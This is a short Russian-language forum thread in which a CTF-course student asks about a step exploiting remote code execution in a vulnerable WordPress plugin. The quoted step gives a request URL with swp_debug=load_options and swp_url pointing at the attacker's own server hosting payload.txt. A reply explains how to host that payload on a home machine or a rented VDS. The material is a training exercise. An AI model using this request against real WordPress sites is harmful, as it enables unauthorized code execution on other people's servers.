10.11.2025, 15:09
|
|
Новичок
Регистрация: 31.01.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Lastweek сказал(а):
Всем доброго времени суток!
Проходя курс Введение в CTF столкнулся с проблемой
В Разделе 6 - Эксплуатируем RCE в уязвимом плагине WordPress
Согласно инструкции теперь нам нужно посетить следующую страницу - http://уязвимый_сервер/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://сервер_где_расположен_наш_ф айл/payload.txt:
- Указываем уязвимый сервер, не забывая про порт 18500.
- Указываем IP-адрес или домен нашего VDS, а также порт, который мы написали в команде с python3
Как найти "http://сервер_где_расположен_наш_ф айл/" ?
Что значит "Указываем IP-адрес или домен нашего VDS, а также порт, который мы написали в команде с python3"?
Добрый день! Это значит вам нужно развернуть свои Web Сервер или воспользоваться готовым если у вас его нет. Развернуть вы его можете как у себя на домашнем ПК, не забыв настроить NAT (пробросить порты на роутере домашнем) или арендовать сервер VDS и там поднять Web Сервер
|
|
|